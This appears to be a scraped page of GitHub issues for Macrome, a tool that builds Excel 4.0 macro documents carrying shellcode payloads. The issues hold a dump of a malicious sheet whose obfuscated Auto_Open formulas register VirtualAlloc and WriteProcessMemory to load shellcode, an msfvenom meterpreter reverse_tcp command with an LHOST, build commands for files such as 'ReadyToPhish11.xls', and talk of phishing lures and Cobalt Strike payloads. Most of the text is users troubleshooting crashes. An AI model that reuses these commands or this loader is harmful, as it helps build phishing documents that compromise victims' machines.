michaelweber / macrome Goto Github PK

like id =1 , blankGraph.
in ms document , record enum begin at 6.................
can u guys propose some help infomation about where these record name (and field info) from.....thanks for this code inspire

I get the following errors when trying to dump a malicious spreadsheet:

C:\Users\jm460\Downloads\macrome>Macrome.exe dump --path C:\Users\jm460\Downloads\macrome\deobfuscated.xls
BoundSheet8 (0x10 bytes) - flags: 0x0 | SheetType: Macrosheet | HiddenState: Visible | Name [unicode=False]: qUKYONz;
BoundSheet8 (0xE bytes) - flags: 0x0 | SheetType: Worksheet | HiddenState: Visible | Name [unicode=False]: Sheet1
BIFF RecordType: SupBook - Length: 4
BIFF RecordType: ExternSheet - Length: 14
Lbl (0x1D bytes) - flags: 0xB | fBuiltin: False | fHidden: True | Name [unicode=False]: _xlfn.BITXOR | Formula: #NAME?
Lbl (0x17 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: ajeZFUwb
Lbl (0x20 bytes) - flags: 0x20 | fBuiltin: True | fHidden: False | Name [unicode=False]: Auto_Open1uto_Open1 !AUTO_OPEN! | Formula: qUKYONz;!A1
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button144_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button145_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button146_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button147_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button148_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button149_Click
Lbl (0x17 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: cecvdVub
Lbl (0x17 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: ikXOTAkJ
Lbl (0x1B bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: JIpHQ | Formula: qUKYONz;!F1
Lbl (0x15 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: KtyKQp
Lbl (0x15 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: viaBBg
Formula[A1]: ACTIVATE("qUKYONz;")
Formula[F1]: ARGUMENT("KtyKQp",2)
Formula[A2]: JIpHQ("=RE"&"GIS"&"TER(CHAR(109)&CHAR(115)&CHAR(118)&CHAR(99)&CHAR(114)&CHAR(116), CHAR(103)&CHAR(101)&CHAR(116)&CHAR(101)&CHAR(110)&CHAR(118), ""CC"", ""ajeZFUwb"", , 1, 9)")
Formula[F2]: FORMULA(KtyKQp,F3)
Formula[A3]: ajeZFUwb("USERDOMAIN")
Formula[A4]: IF(ISNUMBER(SEARCH("64",GET.WORKSPACE(1))))
Formula[F4]: FORMULA("",F3)
Formula[A5]: JIpHQ("=RE"&"GIS"&"TER(CHAR(75)&CHAR(69)&CHAR(82)&CHAR(78)&CHAR(69)&CHAR(76)&""32"", CHAR(86)&CHAR(105)&CHAR(114)&CHAR(116)&CHAR(117)&CHAR(97)&CHAR(108)&CHAR(65)&CHAR(108)&CHAR(108)&CHAR(111)&CHAR(99), ""JJJJJ"", ""cecvdVub"", , 1, 9)")
Formula[F5]: RETURN()
Formula[A6]: SET.VALUE(C6,0)
Formula[A7]: SET.VALUE(C7,65536)
Formula[A8]: WHILE(C6=0)
Formula[A9]: SET.VALUE(C7,C7+8192)
Formula[A10]: cecvdVub(C7,1024,12288,64)
Formula[A11]: SET.VALUE(C6,A10)
Formula[A12]: NEXT()
Formula[A13]: JIpHQ("=RE"&"GIS"&"TER(CHAR(75)&CHAR(69)&CHAR(82)&CHAR(78)&CHAR(69)&CHAR(76)&""32"",CHAR(87)&CHAR(114)&CHAR(105)&CHAR(116)&CHAR(101)&CHAR(80)&CHAR(114)&""oces""&CHAR(115)&CHAR(77)&CHAR(101)&CHAR(109)&CHAR(111)&CHAR(114)&CHAR(121),""JJJCJE"",""viaBBg"",,1,9)")
Unhandled exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.InvalidOperationException: Stack empty.
at System.Collections.Generic.Stack1.ThrowForEmptyStack() at System.Collections.Generic.Stack1.Pop()
at b2xtranslator.xls.XlsFileFormat.PtgHelper.GetFormulaStringInner(Stack1& ptgStack, Boolean showAttributes) in C:\Users\Weber\source\repos\michaelweber\Macrome\b2xtranslator\Xls\XlsFileFormat\PtgHelper.cs:line 255 at b2xtranslator.xls.XlsFileFormat.PtgHelper.GetFormulaString(Stack1 ptgStack, Boolean showAttributes) in C:\Users\Weber\source\repos\michaelweber\Macrome\b2xtranslator\Xls\XlsFileFormat\PtgHelper.cs:line 370
at b2xtranslator.Spreadsheet.XlsFileFormat.Records.Formula.ToFormulaString(Boolean showAttributes) in C:\Users\Weber\source\repos\michaelweber\Macrome\b2xtranslator\Xls\XlsFileFormat\Records\Formula.cs:line 261
at Macrome.BiffRecordExtensions.ToHexDumpString(BiffRecord record, Int32 maxLength, Boolean showAttrInfo) in C:\Users\Weber\source\repos\michaelweber\Macrome\BiffRecordExtensions.cs:line 85
at Macrome.Program.Dump(FileInfo path, Boolean dumpAll, Boolean showAttrInfo, Boolean dumpHexBytes) in C:\Users\Weber\source\repos\michaelweber\Macrome\Program.cs:line 85
--- End of inner exception stack trace ---
at System.RuntimeMethodHandle.InvokeMethod(Object target, Object[] arguments, Signature sig, Boolean constructor)
at System.Reflection.RuntimeMethodInfo.UnsafeInvokeInternal(Object obj, Object[] parameters, Object[] arguments)
at System.CommandLine.Invocation.ModelBindingCommandHandler.d__8.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Invocation.InvocationPipeline.<>c__DisplayClass4_0.<b__0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__20_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c__DisplayClass15_0.<b__0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c__DisplayClass24_0.<b__0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c__DisplayClass22_0.<b__0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__21_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__19_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__11_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__10_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c__DisplayClass13_0.<b__0>d.MoveNext()

I have no idea why this happens, but if you use the --password flag, your decoy document can't have a normal embedded image. To get around this my example uses a tiled background, but that's not something you're going to use in a common phishing lure.

Macro provided by Excelntdonut using -- obfuscate on excelntdonut, says formula is too long maximum character 255

Build arg like :.\Macrome.exe build --decoy-document 1.xls --payload payload.bin --payload-method Base64 --method ArgumentSubroutines --password VelvetSweatshop --output-file-name ReadyToPhish11.xls on win11,x64 version

msfvenom -a x86 -b '\x00' -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=1123 EXITFUNC=thread -f raw > t86.bin
dotnet Macrome.dll build --decoy-document decoy_document.xls --payload t86.bin

When I open output.xls, it crashes when I enable macros

Hi,

I tried to used - and get error about format of cells - I take screenshots:

https://ibb.co/TBR5bP5
https://ibb.co/HNScKb1

then GoTo and contents of cell with error are

=FORMULA($FE$512;$A$1)

Command for generate - very basic:

Macrome.exe build --decoy-document decoy_document.xls --payload popcalc.bin --output-file-name CharSubroutine-Macro_calc32.xls

OS version and Excel - Windows 10, Excel 2016 32bit.

I do not know what else to add, except for what I can do PoC from the article https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/ for calc32 or for Metasploit - on the same machine and Excel .

first thanks for sharing such great tool, but it crushes when using cobalstrike RAW Shellcode any idea why thanks

It appears that some of my Unicode fun for obfuscating the Auto_Open label doesn't fly on the MacOS version of office. It should be possible to disable the obfuscation (which currently ALWAYS happens regardless of what you call your label) with a flag. I suspect this also is breaking auto_open functionality for some international language settings.

Hi,

Auto_open never triggers in Excel 2019 32 Bit (Language: Turkish) version.

I have tried it with both Macrome and the test macro below with International Macro Sheet. I am also sending the sample file attached.

=EXEC("notepad.exe")
=HALT()

test-4.0.zip

Do you have any advice?

Hi. Great work! Does it need a specific version of dotnet sdk installed? I installed the latest one for windows on a Windows 10 VM and built it without issues. When I run the DLL with the command "dotnet macrome.dll --build etc etc etc..." I get an error stating that the version 2.0 is not installed on the machine and it gives me the URL to download it. It's no longer supported but I guess I can finde it somewhere but the question is "do I really need it?". Thanks!

how to use this with putty than popcalc or metalsploit payload generated?

Decoy documents should be able to have any number of sheets - right now it's essentially hard coded to assume the sheet is in position 1. This should be fixed.

Does not work on office16 and 2019. x64 bit.

A crash occurs and it exits.

my command:

 ./Macrome build --decoy-document Docs/decoy_document.xls --payload Docs/popcalc.bin --payload64-bit Docs/popcalc64.bin

build file:
poc.zip

Hello @michaelweber first of all thanks for this amazing tool!
I am playing around with this tool and testing locally and all works and now when im onto Macros section, i read it can import your own created macros.

My macro_example.txt is this one :
=ALERT("Excel document is outdated")
=QUIT()

Macrome.dll build --decoy-document decoy_document.xls --payload macro_example.txt --payload-type Macro and i get this error:

Unhandled exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.InvalidOperationException: Sequence contains no elements

As it uses a basic very simple macro as you can see and i cant get it working if you can give me any clue or anything i would appreciate it, thanks @michaelweber